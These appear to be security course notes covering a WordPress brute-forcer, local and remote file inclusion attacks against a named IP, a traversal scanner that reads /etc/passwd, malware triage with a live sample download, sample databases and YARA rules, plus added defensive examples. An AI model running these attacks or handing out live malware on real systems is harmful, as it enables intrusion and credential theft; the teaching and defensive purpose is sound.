- https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 31-40)
- ######################
- # Lesson 29: Web App #
- ######################
- vi wpbruteforcer.py
- python wpbruteforcer.py -t strategicsec.com -u j0e -w list.txt
- - Here is an example of an LFI
- - Open this page in Firefox:
- http://54.186.248.116/showfile.php?filename=contactus.txt
- - Notice the page name (showfile.php) and the parameter name (filename) and the filename (contactus.txt)
- - Here you see a direct reference to a file on the local filesystem of the victim machine.
- - You can attack this by doing the following:
- http://54.186.248.116/showfile.php?filename=/etc/passwd
- - This is an example of a Local File Include (LFI). To change this attack into a Remote File Include (RFI) you need some content from somewhere else on the Internet. Here is an example of a text file on the web:
- http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
- - Now we can attack the target via RFI like this:
- http://54.186.248.116/showfile.php?filename=http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
- - Now let's see if we can write some code to do this for us:
- vi LFI-RFI.py
- #!/usr/bin/env python
- print "\n### PHP LFI/RFI Detector ###"
- print "### Sean Arries 09/18/09 ###\n"
- import urllib2,re,sys
- TARGET = "http://54.186.248.116/showfile.php?filename=contactus.txt"
- RFIVULN = "http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt?"
- TravLimit = 12
- print "==> Testing for LFI vulns.."
- TARGET = TARGET.split("=")[0]+"=" ## URL MANIPULATION
- for x in xrange(1,TravLimit): ## ITERATE THROUGH THE LOOP
-     TARGET += "../"
-     try:
-         source = urllib2.urlopen((TARGET+"etc/passwd")).read() ## WEB REQUEST
-     except urllib2.URLError, e:
-         print "$$$ We had an Error:",e
-         sys.exit(0)
-     if re.search("root:x:0:0:",source): ## SEARCH FOR TEXT IN SOURCE
-         print "!! ==> LFI Found:",TARGET+"etc/passwd"
-         break ## BREAK LOOP WHEN VULN FOUND
- print "\n==> Testing for RFI vulns.."
- TARGET = TARGET.split("=")[0]+"="+RFIVULN ## URL MANIPULATION
- try:
-     source = urllib2.urlopen(TARGET).read() ## WEB REQUEST
- except urllib2.URLError, e:
-     print "$$$ We had an Error:",e
-     sys.exit(0)
- if re.search("j0e",source): ## SEARCH FOR TEXT IN SOURCE
-     print "!! => RFI Found:",TARGET
- print "\nScan Complete\n" ## DONE
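The `showfile.php?filename=` handler is vulnerable because the parameter is used as a path (and, with URL wrappers enabled, as a URL) without any check. As an added example (Python 3, not from the course notes), here is the same handler as a small Python function in its vulnerable form next to a hardened one. The hardened version is the fix for both findings: it never treats the parameter as a URL, resolves the path, and refuses anything that does not end up inside the document directory. The temporary docroot, file names and contents, and the `demo()` request list are constructed for the example.

```python
# Added example (Python 3, not from the course notes): a file-serving handler in its
# vulnerable form (parameter used as a path as-is) and a hardened form that confines
# requests to the document root and rejects URLs.
import os
import tempfile
from pathlib import Path

def show_file_vulnerable(docroot, filename):
    """Mirror of the vulnerable handler: whatever the client sent is joined onto docroot."""
    with open(os.path.join(docroot, filename), "rb") as fh:
        return fh.read()

def show_file_hardened(docroot, filename):
    """Serve only regular files that resolve inside docroot; return None for anything else."""
    if "://" in filename or filename.startswith(("/", "\\")) or "\x00" in filename:
        return None                                   # URLs, absolute paths, embedded NUL
    base = Path(docroot).resolve()
    target = (base / filename).resolve()              # collapses ../ and follows symlinks
    if base not in target.parents or not target.is_file():
        return None                                   # escaped the docroot, or not a plain file
    with open(target, "rb") as fh:
        return fh.read()

def demo():
    """Build a throwaway docroot holding contactus.txt, put a 'secret' one level above it,
    and return {request: (vulnerable_result, hardened_result)} for three requests."""
    with tempfile.TemporaryDirectory() as tmp:
        docroot = os.path.join(tmp, "www")
        os.mkdir(docroot)
        with open(os.path.join(docroot, "contactus.txt"), "wb") as fh:
            fh.write(b"contact us at ...")
        with open(os.path.join(tmp, "secret.txt"), "wb") as fh:
            fh.write(b"root:x:0:0:")                  # stand-in for /etc/passwd
        requests = ["contactus.txt",                  # the legitimate request
                    "../secret.txt",                  # local file include via traversal
                    "http://example.com/hello.txt"]   # remote include attempt (constructed URL)
        results = {}
        for name in requests:
            try:
                vuln = show_file_vulnerable(docroot, name)
            except OSError:
                vuln = "error"                        # a URL is not a local path here
            results[name] = (vuln, show_file_hardened(docroot, name))
        return results

if __name__ == "__main__":
    for req, (vuln, hard) in demo().items():
        print("%-32s vulnerable=%r hardened=%r" % (req, vuln, hard))
```

Resolving first and then checking `base in target.parents` is what makes the check hold against `..`, symlinks and encoded variants alike; denylisting the string `../` does not. An allowlist of servable names is stricter still when the set of files is known.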
- ###############################
- # Lesson 30: Malware Analysis #
- ###############################
- This is actual malware (remember to run it in a VM; the password to extract it is 'infected'):
- wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip
- wget http://www.beenuarora.com/code/analyse_malware.py
- unzip malware-password-is-infected.zip
- infected
- file malware.exe
- mv malware.exe malware.pdf
- file malware.pdf
- mv malware.pdf malware.exe
- hexdump -n 2 -C malware.exe
- ***What is '4d 5a' or 'MZ'***
- Reference: http://www.garykessler.net/library/file_sigs.html
- objdump -x malware.exe
- strings malware.exe
- strings --all malware.exe | head -n 6
- strings malware.exe | grep -i dll
- strings malware.exe | grep -i library
- strings malware.exe | grep -i reg
- strings malware.exe | grep -i hkey
- strings malware.exe | grep -i hku
- - We didn't see anything like HKLM, HKCU or other registry type stuff
- strings malware.exe | grep -i irc
- strings malware.exe | grep -i join
- strings malware.exe | grep -i admin
- strings malware.exe | grep -i list
- - List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands
- sudo apt-get install -y python-pefile
- vi analyse_malware.py
- python analyse_malware.py malware.exe
- Here is a 2 million sample malware DB created by Derek Morton that you can use to start your DB with:
- http://derekmorton.name/files/malware_12-14-12.sql.bz2
- Malware Repositories:
- http://malshare.com/index.php
- http://www.malwareblacklist.com/
- http://www.virusign.com/
- http://virusshare.com/
- http://www.tekdefense.com/downloads/malware-samples/
- ##########################################
- # Lesson 31: Creating a Malware Database #
- ##########################################
- Creating a malware database (sqlite)
- ------------------------------------
- wget https://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py
- wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip
- unzip malware-password-is-infected.zip
- infected
- python avsubmit.py --init
- python avsubmit.py -f malware.exe -e
- Creating a malware database (mysql)
- -----------------------------------
- Step 1: Installing MySQL database
- Run the following command in the terminal:
- sudo apt-get install mysql-server
- Step 2: Installing Python MySQLdb module
- Run the following command in the terminal:
- sudo apt-get build-dep python-mysqldb
- sudo apt-get install python-mysqldb
- Step 3: Logging in
- Run the following command in the terminal:
- mysql -u root -p (set a password of 'malware')
- Then create one database by running following command:
- create database malware;
- wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
- vi mal_to_db.py -i (fill in database connection information)
- python mal_to_db.py -i
- python mal_to_db.py -i -f malware.exe -u
- mysql -u root -p
- malware
- mysql> use malware;
- select id,md5,sha1,sha256,time FROM files;
- mysql> quit;
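Both avsubmit.py (sqlite) and mal_to_db.py (MySQL) do the same core work when handed `-f malware.exe`: hash the sample, store the digests with a timestamp, and let you query them back. As an added example (Python 3, not either of those scripts), here is that core with the standard-library `sqlite3` module, using an in-memory database and constructed sample bytes so it runs offline. The schema, column names and the deduplication on SHA-256 are this example's own; the `list_files()` query is the one from the lesson.

```python
# Added example (Python 3, not avsubmit.py or mal_to_db.py): a minimal sample database.
# Every value reaches SQL through a bound parameter, so a hostile file name cannot alter the query.
import hashlib
import sqlite3
import time

SCHEMA = """
CREATE TABLE IF NOT EXISTS files (
    id     INTEGER PRIMARY KEY AUTOINCREMENT,
    name   TEXT NOT NULL,
    size   INTEGER NOT NULL,
    md5    TEXT NOT NULL,
    sha1   TEXT NOT NULL,
    sha256 TEXT NOT NULL UNIQUE,   -- one row per sample, however many names it arrives under
    time   TEXT NOT NULL
)"""

def hash_sample(data):
    """MD5, SHA-1 and SHA-256 hex digests in one pass, as the tools and VirusTotal display them."""
    md5, sha1, sha256 = hashlib.md5(), hashlib.sha1(), hashlib.sha256()
    for h in (md5, sha1, sha256):
        h.update(data)
    return md5.hexdigest(), sha1.hexdigest(), sha256.hexdigest()

def init_db(path=":memory:"):
    """Equivalent of --init: create the table and return the connection."""
    conn = sqlite3.connect(path)
    conn.execute(SCHEMA)
    conn.commit()
    return conn

def add_sample(conn, name, data, when=None):
    """Insert one sample and return its row id; a re-submitted sample returns the existing id."""
    md5, sha1, sha256 = hash_sample(data)
    when = when or time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime())
    row = conn.execute("SELECT id FROM files WHERE sha256 = ?", (sha256,)).fetchone()
    if row:
        return row[0]
    cur = conn.execute(
        "INSERT INTO files (name, size, md5, sha1, sha256, time) VALUES (?, ?, ?, ?, ?, ?)",
        (name, len(data), md5, sha1, sha256, when))
    conn.commit()
    return cur.lastrowid

def list_files(conn):
    """The lesson's query: (id, md5, sha1, sha256, time) for every stored sample."""
    return conn.execute("SELECT id, md5, sha1, sha256, time FROM files ORDER BY id").fetchall()

def lookup(conn, digest):
    """Triage helper: find a sample by any one of its digests, case-insensitively."""
    d = digest.lower()
    return conn.execute("SELECT id, name FROM files WHERE md5 = ? OR sha1 = ? OR sha256 = ?",
                        (d, d, d)).fetchone()

if __name__ == "__main__":
    db = init_db()
    fake_pe = b"MZ" + b"\x00" * 62 + b"PE\x00\x00"   # constructed stand-in for malware.exe
    add_sample(db, "malware.exe", fake_pe)
    add_sample(db, "malware.pdf", fake_pe)            # the renamed copy from Lesson 30: same row
    for row in list_files(db):
        print(row)
```

Keying the table on SHA-256 is what makes the `mv malware.exe malware.pdf` exercise from Lesson 30 harmless to the database: the name changes, the digests do not, so the second submission resolves to the first row.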
- ##############################
- # Lesson 32: Setting up Yara #
- ##############################
- sudo apt-get install clamav clamav-freshclam
- sudo freshclam
- sudo clamscan
- sudo apt-get install libpcre3 libpcre3-dev
- wget https://github.com/plusvic/yara/archive/v3.1.0.tar.gz
- wget http://yara-project.googlecode.com/files/yara-python-1.4.tar.gz
- tar -zxvf v3.1.0.tar.gz
- cd yara-3.1.0/
- ./bootstrap.sh
- ./configure
- make
- make check
- sudo make install
- cd yara-python/
- python setup.py build
- sudo python setup.py install
- cd ..
- yara -v
- wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/3/clamav_to_yara.py
- sigtool -u /var/lib/clamav/main.cvd
- python clamav_to_yara.py -f main.ndb -o clamav.yara
- wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip
- unzip malware-password-is-infected.zip
- infected
- mkdir malcode/
- mv malware.exe malcode/
- vi testrule.yara
- ----------------
- rule IsPE
- {
-     meta:
-         description = "Windows executable file"
-     condition:
-         // MZ signature at offset 0 and ...
-         uint16(0) == 0x5A4D and
-         // ... PE signature at offset stored in MZ header at 0x3C
-         uint32(uint32(0x3C)) == 0x00004550
- }
- rule has_no_DEP
- {
-     meta:
-         description = "DEP is not enabled"
-     condition:
-         IsPE and
-         uint16(uint32(0x3C)+0x5E) & 0x0100 == 0
- }
- rule has_no_ASLR
- {
-     meta:
-         description = "ASLR is not enabled"
-     condition:
-         IsPE and
-         uint16(uint32(0x3C)+0x5E) & 0x0040 == 0
- }
- ----------------
- yara testrule.yara malcode/malware.exe
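The `hexdump -n 2` and `strings` steps of Lesson 30 and the three YARA rules above are all reading fixed offsets in the PE header: `MZ` at 0, the PE header offset at 0x3C, and the optional header's DllCharacteristics at 0x5E past that, where bit 0x0100 is NX_COMPAT (DEP) and bit 0x0040 is DYNAMIC_BASE (ASLR). As an added example (Python 3, not from the course notes, pefile or YARA), here is the same logic done by hand with `struct`, plus a `strings`-style extractor, so the offsets are visible. A minimal PE32 header is constructed inline with `build_test_pe()` instead of using the malware sample; the embedded string values are made up for the example.

```python
# Added example (Python 3, not from the course, pefile or YARA): PE header checks matching
# the testrule.yara conditions, and a printable-string extractor like `strings`.
import re
import struct

IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040   # ASLR opt-in
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100      # DEP opt-in

def pe_header_info(data):
    """Verdicts equivalent to the YARA rules, or {'is_pe': False} when the file is not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":                # uint16(0) == 0x5A4D
        return {"is_pe": False}
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)        # uint32(0x3C)
    if len(data) < e_lfanew + 24 + 72 or data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return {"is_pe": False}
    machine, nsections = struct.unpack_from("<HH", data, e_lfanew + 4)   # COFF header
    (magic,) = struct.unpack_from("<H", data, e_lfanew + 24)             # optional header magic
    # DllCharacteristics is 70 bytes into the optional header for both PE32 and PE32+:
    # 4 (PE sig) + 20 (COFF) + 70 = 0x5E past e_lfanew, the YARA rules' uint16(uint32(0x3C)+0x5E)
    (dllchar,) = struct.unpack_from("<H", data, e_lfanew + 0x5E)
    return {
        "is_pe": True,
        "machine": hex(machine),
        "sections": nsections,
        "pe32plus": magic == 0x20B,
        "dep": bool(dllchar & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
        "aslr": bool(dllchar & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
    }

def ascii_strings(data, min_len=4):
    """What `strings` prints by default: runs of at least min_len printable ASCII bytes."""
    return [m.group().decode() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]

def build_test_pe(dllchar, strings=(b"KERNEL32.dll", b"RegSetValueExA")):
    """Constructed PE32 header for the example: MZ stub, e_lfanew = 0x40, one section,
    the given DllCharacteristics, then a few NUL-separated strings as a fake import area."""
    buf = bytearray(0x40 + 24 + 96)                  # DOS header + PE sig/COFF + PE32 optional header
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)
    buf[0x40:0x44] = b"PE\x00\x00"
    struct.pack_into("<HH", buf, 0x44, 0x14C, 1)     # IMAGE_FILE_MACHINE_I386, 1 section
    struct.pack_into("<H", buf, 0x40 + 24, 0x10B)    # PE32 magic
    struct.pack_into("<H", buf, 0x40 + 0x5E, dllchar)
    return bytes(buf) + b"\x00".join(strings) + b"\x00"

if __name__ == "__main__":
    sample = build_test_pe(IMAGE_DLLCHARACTERISTICS_NX_COMPAT)   # DEP on, ASLR off
    print(pe_header_info(sample))
    print(ascii_strings(sample))
```

Two caveats carry over to the YARA rules: a file that starts with `MZ` but whose `e_lfanew` points past the end (or at something other than `PE\0\0`) is not a PE and must not be reported as lacking DEP or ASLR, which is why `IsPE` is a precondition of the other two rules; and the 0x5E offset assumes a well-formed optional header, which packed or deliberately malformed samples may not have.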
- mkdir rules/
- cd rules/
- wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/5/capabilities.yara
- wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/6/magic.yara
- wget https://malwarecookbook.googlecode.com/svn-history/r5/trunk/3/4/packer.yara
- cd ..
- yara rules/ malcode/malware.exe
- wget https://github.com/Xen0ph0n/YaraGenerator/archive/master.zip
- unzip master.zip
- cd YaraGenerator-master/
- python yaraGenerator.py ../malcode/ -r Test-Rule-2 -a "Joe McCray" -d "Test Rule Made With Yara Generator" -t "TEST" -f "exe"
- cat Test-Rule-2.yar
- wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
- yara Test-Rule-2.yar putty.exe
- ####################
- # Additional Tasks #
- ####################
- - PE Scanner:
- https://malwarecookbook.googlecode.com/svn/trunk/3/8/pescanner.py
- http://www.beenuarora.com/code/analyse_malware.py
- - AV submission:
- http://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py
- https://raw.githubusercontent.com/dcmorton/MalwareTools/master/vtsubmit.py
- - Malware Database Creation:
- https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py